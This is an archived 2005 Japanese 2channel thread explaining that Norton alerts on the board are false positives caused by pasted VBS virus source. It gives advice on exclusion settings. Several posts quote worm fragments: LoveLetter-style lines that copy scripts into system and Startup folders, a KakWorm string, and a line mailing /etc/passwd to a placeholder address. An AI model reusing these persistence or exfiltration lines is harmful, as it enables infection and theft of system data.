5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ノートンがvbsウィルスのソースに誤反応3

1 :他のアンチウィルスソフトが反応する場合もあります:05/03/01 01:58:58 ID:???
只今2chでvbsのウィルスのソースを貼りノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるのでこのスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応このスレで報告願えると幸いです。

■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されることは無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダにhtmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
これらのファイルは削除しても全く問題ありませんが、該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされてしまうので警告が出ます。

■まとめと対策■
2ちゃんねる見ていたらvbsウィルスが検出された!
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq12
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。

前スレ
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応2
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/

テンプレ>>1-10あたり

2 :ひよこ名無しさん:05/03/01 01:59:38 ID:???
■既知のvbsウィルスのソース■

・VBS.Internal
出元はhttp://tmp.2ch.net/test/read.cgi/download/1025717301/197だと思われる。
ダウソ板からいろんな板へ飛び火した模様。

・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)出元不明。ニュー速から?

一般論として「htm」「html」拡張子などを安易に検索対象から外すことは奨励されません。これを感染ターゲットにするウィルスが数種確認されています。
http://www.symantec.com/region/jp/sarcj/data/v/vbs.internal.html


Q.ウイルスコードが貼られているのにノートン反応しない。。。

A.ウイルスコードが貼られている2ちゃんねるのスレをテストページとして使用するのは奨励されない。
なぜなら、ここで言われているノートンの反応は単なる掲示板とスキャンエンジンの「仕様の衝突」であり、
これからも同じページを見ればその都度反応するという保証がないから。
仕様というものは、ある時突然変更されたりするもの。

ネットサーフィン中のウイルス対策ソフトの常駐動作確認は、テスト用に作られたEICARテストファイルにアクセスして行うべき。

EICARテストファイル(正常に常駐していればURLにアクセスと同時に反応します)
ttp://www.eicar.org/download/eicar.com.txt

3 :ひよこ名無しさん:05/03/01 01:59:46 ID:???
        / ̄|
       |  |
       |  |                  / ̄ ̄ ̄ ̄ ̄ ̄
      ,―    \                |
     | ___)   |       ∩∩    ∠ リュンパッチ♪
     | ___)   |       | |_| |      \______
     | ___)   |\___(・∀・ )_____
     ヽ__)_/ \___     _____, )__
         〃  .       /    /     / /    〃⌒i
         |          /    ./     / /    .i::::::::::i
   ____|     /⌒\./    /     / | ____|;;;;;;;;;;;i
  [__]___|    / /-、 .\_.  /     Uし'[_]     .|
   | ||     |    / /i  i    /         | ||      |
   | ||____|____/ / .| .|\_ノ______..| ||      |
   |(_____ノ /_| |_________..| ||      |
   | LLLLLL./ __)L_| |LLLLLLLLLLLLLLLLL. | ||_____」
   | ||    (_/   / i                .| ||    | ||
   |_||        / .ノ               |_||    |_||
            (_/

4 :ひよこ名無しさん:05/03/01 02:00:21 ID:???
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

<  => &lt;
>  => &gt;
&  => &amp;
"  => &quot;

それぞれしっかり置換されていれば反応しない、ここの掲示板の問題。
ノートンが反応するのは、ここの掲示板(2Ch)の仕様なので気にする必要なし。
ここは、時に他のウィルス対策ソフトが反応する場合もある。
反応したらソースを見てみるといい。他の掲示板と違うことに気付くはずだ。

断言できることは、他のWebページでノートンが反応した場合は要注意ということ。


尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
http://find.2ch.net/?STR=%CD%A6%B5%A4%A4%AC%CC%B5%A4%AF%A4%C6+%B2%F2%C0%E2%A5%B9%A5%EC&COUNT=50&TYPE=TITLE&BBS=ALL


■関連
ノートン入れたら2chに書きこめない人へ
http://ansitu.s53.xrea.com/guidance/index.php?NortonInternetSecurity
ノートンインターネットセキュリティ@2ちゃんねる検索
http://find.2ch.net/?STR=%A5%CE%A1%BC%A5%C8%A5%F3+%8E%B2%8E%DD%8E%C0%8E%B0%8E%C8%8E%AF%8E%C4%8E%BE%8E%B7%8E%AD%8E%D8%8E%C3%8E%A8+board%3A%A5%BB%A5%AD%A5%E5%A5%EA%A5%C6%A5%A3&COUNT=50&TYPE=TITLE&BBS=ALL
【ノートン入れたら2chに書きこめない】人へ@2ちゃんねる検索
http://find.2ch.net/?STR=%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2%A3%E3%A3%E8%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4+%BF%CD%A4%D8+board%3A%BD%E9%BF%B4%BC%D4%A4%CE%BC%C1%CC%E4&COUNT=50&TYPE=TITLE&BBS=ALL

5 :ひよこ名無しさん:05/03/01 02:05:28 ID:???
補足ありましたらお願いします。

6 :ひよこ名無しさん:05/03/01 02:06:29 ID:???
ニャンです

7 :ひよこ名無しさん:05/03/01 18:00:01 ID:???
Q.2ちゃんねるの板開いただけで反応します。

A.スレッドタイトルにウイルスコードが貼られていることがあり、それに反応しています。
2ちゃんねるブラウザの場合、ログ保存フォルダの他にスレタイ・既読スレ履歴等を保存しているファイルやフォルダを除外。
各2ちゃんねるブラウザによってスレタイ・既読スレ履歴等を保存しているファイルやフォルダが異なるようなので
特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/7c3ff4677729271685256c470046ed2e/d9265b84ded9587488256b0400811ff7
↑を参考にお使いの2ちゃんねるブラウザのスレでお聞きください。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08

8 :ひよこ名無しさん:05/03/02 00:36:43 ID:???
その他リンク@2ちゃんねる検索

エロサイト見たら…助けて下さい!
http://find.2ch.net/?STR=%A5%A8%A5%ED%A5%B5%A5%A4%A5%C8%B8%AB%A4%BF%A4%E9+%BD%F5%A4%B1%A4%C6%B2%BC%A4%B5%A4%A4+board%3APC%BD%E9%BF%B4%BC%D4&COUNT=50&TYPE=TITLE&BBS=ALL

パソコン初心者総合質問スレッド
http://find.2ch.net/?STR=%A5%D1%A5%BD%A5%B3%A5%F3%BD%E9%BF%B4%BC%D4%C1%ED%B9%E7%BC%C1%CC%E4%A5%B9%A5%EC%A5%C3%A5%C9+board%3APC%BD%E9%BF%B4%BC%D4&COUNT=50&TYPE=TITLE&BBS=ALL

セキュリティ初心者質問スレッド
http://find.2ch.net/?STR=%A5%BB%A5%AD%A5%E5%A5%EA%A5%C6%A5%A3%BD%E9%BF%B4%BC%D4%BC%C1%CC%E4%A5%B9%A5%EC%A5%C3%A5%C9+board%3A%A5%BB%A5%AD%A5%E5%A5%EA%A5%C6%A5%A3&COUNT=50&TYPE=TITLE&BBS=ALL

9 :ひよこ名無しさん:05/03/03 00:26:00 ID:???
    ◆◇◆ 報告用テンプレ ◆◇◆  (暫定)

>>1-9を読みましたか?            『YES/NO』
■2ちゃんねるの板・スレ・レス番のアドレス  『 』
■ノートンのメッセージ(ウイルス名)        『 』
■ブラウザの種類                 『 』
■ノートンのヴァージョン             『 』
■ノートン以外のアンチウイルスソフト名    『 』
■その他.                        『 』

10 :ひよこ名無しさん:05/03/03 01:13:35 ID:???
2ちゃんねるに貼られたウイルスコードに誤反応していたことがわかったら

インターネットエクスプローラの場合
ツール→インターネットオプション→インターネット一時ファイル、ファイルの削除
これをしないでウイルススキャンしたらインターネット一時ファイル(Temporary Internet Filesフォルダ)でウイルス反応がでます。
また、該当レスを再び読み込むとウイルス反応がでます。
2ちゃんねるブラウザを使って以下の設定をして2ちゃんねるを見ましょう。

2ちゃんねるブラウザの場合
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。

11 :ひよこ名無しさん:05/03/03 02:43:55 ID:7F9C8/Th
よろ
kak.hta';ken=wdt'START
ms-its:mhtml:file://c:\


12 :ひよこ名無しさん:05/03/03 18:20:43 ID:???
>>11
既出。
Wscript.KakWorm
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/946
Bloodhound.Exploit.6
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/932

13 :ひよこ名無しさん:05/03/04 01:48:43 ID:hGA62fOr
http://c-au.2ch.net/test/-/pcqa/1033948204/928
このウイルスを解説してください

14 :ひよこ名無しさん:05/03/04 22:18:30 ID:???
DAT落ち阻止て神戸♪


>>13
VBS.LoveLetter.Var
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/928

ウイルスコードが貼られているのにノートン反応しないって人は>>2見てね。

15 :ひよこ名無しさん:05/03/05 00:21:55 ID:hfT/sPqY
ありがとう
しかしラブレター1個だけではないはず。
カーネルやネットワークも入っている。
一つ一つ解説してください。

16 :ひよこ名無しさん:05/03/05 19:06:57 ID:5lPM1YuQ
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"


↑こういうのって最初に気づいた奴って天才だよな

17 :cen ◆Pm9xOTJuM. :05/03/05 20:09:53 ID:??? ?#
あ。そうそう。
>>16 みたいなスクリプトを誤反応しないような、datファイルに
datを作り変えるプログラム作ってみました。
よかったら使ってみてください。
http://www.geocities.jp/cen_hp/index.html

18 :ひよこ名無しさん:05/03/05 22:58:07 ID:???
あやすい・・・・・

19 :cen ◆Pm9xOTJuM. :05/03/06 02:36:23 ID:??? ?#
>>18
自分のパソコンで何度も実行してますが、大丈夫ですよー。
さっき総質で見た、未対応のスクリプトに対応させました。

20 :名無しさん@お腹いぱーい。:05/03/06 22:24:25 ID:??? ?##
>>17,19
ご支援ありがとうございます。
ttp://ansitu.xrea.jp/guidance/?NortonInternetSecurity#faq08tool

21 :ひよこ名無しさん:05/03/06 22:26:34 ID:NzpAHwS7
ここの1の解説キボン
http://c-au.2ch.net/test/-/pcqa/1103598574/1

22 :ひよこ名無しさん:05/03/06 22:32:03 ID:???
==================================
=================/∧ =========/∧
===============/ / λ=======/ / λ        ー
=============/  /  λ====/  /  λ        ー /
===========/   /  /λ =/   /  /λ        /
=========/    / / //λ    / / //λ       __
=======/            ̄ ̄ ̄      \     ___
=====./        / ̄ )         ( ̄ヽ λ       /
====/        /●/          \● /λ     /
===/        //                \  /λ
===|                            / /|   ___|____
==|           ∧________   / //|    /
==|           ヽ───────〆   /////  /|\
===|                        / / ////|    |
===\                      / / /////
=====\_                   / //////__/.      |
========\                   ミ/          |
==========\                 /         ─┐
============\                \ .          ─┤
==============\                \      .   ─┘
================\                \
==================\ ・                \
=====================
======================

23 :ひよこ名無しさん:05/03/09 04:14:09 ID:???
hoshu

24 :ひよこ名無しさん:05/03/09 22:29:16 ID:???
未だにVIPの板更新すると、ノートン先生の逆鱗に触れてしまうオイラですが

2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)

らしいです、騒いでごめんなさい。
2chにかぎっては心配(゚听)イラネみたいです。

25 :24:05/03/09 22:30:49 ID:???
誤爆すいません

26 :ひよこ名無しさん:05/03/10 12:00:18 ID:???
>>24
スレタイにウィルスコードが書いてある模様。

27 :ひよこ名無しさん:05/03/11 19:52:34 ID:???
>>24
漏れもソレダ!!!
もう無視しまくりんぐwwwwwww

28 :ひよこ名無しさん:05/03/11 19:54:19 ID:2tTtEvgw
ノートンなんか使ってんなよ ハゲ

29 :ひよこ名無しさん:05/03/11 20:20:02 ID:???
A Boneを使用してるのですが、PC初心者の上の「初心者の質問」板をクリックするだけで、ノートンがウイルスを検知してしまいます。

しかも板を開く事もできません。毎回そうなってしまいます。
昨日、システムをスキャンしたら確かに感染していました。「初心者の質問」板だけ毎回そうなります。
これは何でしょうか?

30 :ひよこ名無しさん:05/03/11 21:00:24 ID:???
ぐはははははwwwVIPもそうだよ

31 :名無しさん@お腹いぱーい。:05/03/11 22:14:43 ID:??? ?##
>>29
>>7見てね。

32 :ひよこ名無しさん:05/03/12 00:37:07 ID:eI8qHG/W
2ちゃんを普通に見ていただけなのにノートンから「ウィルス名は
Unix.Penguinで、ファイルを修復できません」と表示されてしまいました。何か対策は無いでしょうか?
ちなみに誤作動との見分け方はありますか?

33 :ひよこ名無しさん:05/03/12 04:45:56 ID:???
        / ̄|
       |  |
       |  |                  / ̄ ̄ ̄ ̄ ̄ ̄
      ,―    \                |
     | ___)   |       ∩∩    ∠ リュンパッチ♪
     | ___)   |       | |_| |      \______
     | ___)   |\___(・∀・ )_____
     ヽ__)_/ \___     _____, )__
         〃  .       /    /     / /    〃⌒i
         |          /    ./     / /    .i::::::::::i
   ____|     /⌒\./    /     / | ____|;;;;;;;;;;;i
  [__]___|    / /-、 .\_.  /     Uし'[_]     .|
   | ||     |    / /i  i    /         | ||      |
   | ||____|____/ / .| .|\_ノ______..| ||      |
   |(_____ノ /_| |_________..| ||      |
   | LLLLLL./ __)L_| |LLLLLLLLLLLLLLLL. | ||_____」
   | ||    (_/   / i                .| ||    | ||
   |_||        / .ノ               |_||    |_||
            (_/

34 :ひよこ名無しさん:05/03/12 21:15:24 ID:KI7PmLwk
Open Janeをでスレを見てたらウィルスコードが張られてて
ウィルス警告が出てファイルが修復出来ませんとでました。
ウィルスコードをNGワードに入れたら、NGワードが全部消えて
デスクトップにあるNGWordtxtというアイコンを削除しようとすると
やはりウィルス警告が出て削除できません。
スキャンをするとあるファイルの所まで来ると電源が切れてしまいます。
ウィルス名は「Bloodhound.Exploit6」と出るのですが、どうしたらいいでしょうか・・・。

35 :ひよこ名無しさん:05/03/12 21:50:19 ID:???
>>34
        ∩∩
        | |_| |        / ̄ ̄ ̄ ̄ ̄ ̄ ̄
  / ̄\ ・∀・)   < リュンパッチ♪
.r ┤    ト、    \    \_______
|.  \_/  ヽ   |
|   __( ̄  | |  |
|    __)_ノ ̄ ̄ ̄ ̄\
ヽ___) ノ          \
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
  ||  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
     .||              ||

36 :34:05/03/12 23:34:38 ID:???
すみません。
1つは解決しましたがスキャンすると電源が落ちるのは直りませんので
これは他のスレで聞いてみます

37 :ひよこ名無しさん:05/03/17 15:26:43 ID:???
なんだ、最近多いと思ってたがウィルスコードのせいだったのか。
しかしこれってあぼーんされないのかな。
とりあえずここみて安心した。ありがと。

20 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)